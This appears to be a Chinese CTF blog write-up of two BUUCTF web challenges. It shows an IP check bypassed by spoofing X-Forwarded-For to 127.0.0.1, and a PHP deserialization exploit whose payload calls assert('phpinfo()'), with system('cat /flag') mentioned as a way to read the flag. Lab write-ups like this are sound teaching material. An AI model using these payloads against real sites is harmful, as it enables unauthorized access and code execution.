BUUCTF Web [MRCTF2020]PYWebsite1 & [NPUCTF2020]ReadlezPHP1

目录

[MRCTF2020]PYWebsite1

[NPUCTF2020]ReadlezPHP1


[MRCTF2020]PYWebsite1

启动靶机

 根据网页提示,我们需要点击BUY IT NOW,支付后,会得到授权码,在下方输入即可得到flag。

右键查看网页源代码

通过js代码可以发现,前端判断通过授权码后会跳转到./flag.php。直接访问flag.php

有校验,通过网页信息得知后端会判断ip是不是购买者,页面提示只有购买者和自己可以看到flag,其他购买者的ip猜不到,但我们可以伪造本地ip。

X-Forwarded-For:127.0.0.1

刷新此页面,并抓包,添加一行  X-Forwarded-For:127.0.0.1

 拿到flag             flag{a72cbd57-68e9-4aef-8a6c-56c735dab584}

[NPUCTF2020]ReadlezPHP1

启动靶机

 一个报时页面,刷新页面,下面的时间也会刷新,f12查看报时部分代码

发现了一个链接,直接访问

 

代码审计,反序列化。

重点是这一行,如果b是system,a是cat /flag 那么就会执行system('cat /flag'),尝试构造命令:

打开php在线运行,执行序列化代码。

<?php  
class HelloPhp
{
    public $a = "phpinfo()";
    public $b = "assert";       //这里system被过滤了
}

$a = serialize(new HelloPhp);
echo $a;
?> 

 构造payload:

/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

ctrl+f   搜索flag         flag{a6a5a5db-ea36-4d8a-a7d8-342853f58d8b}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值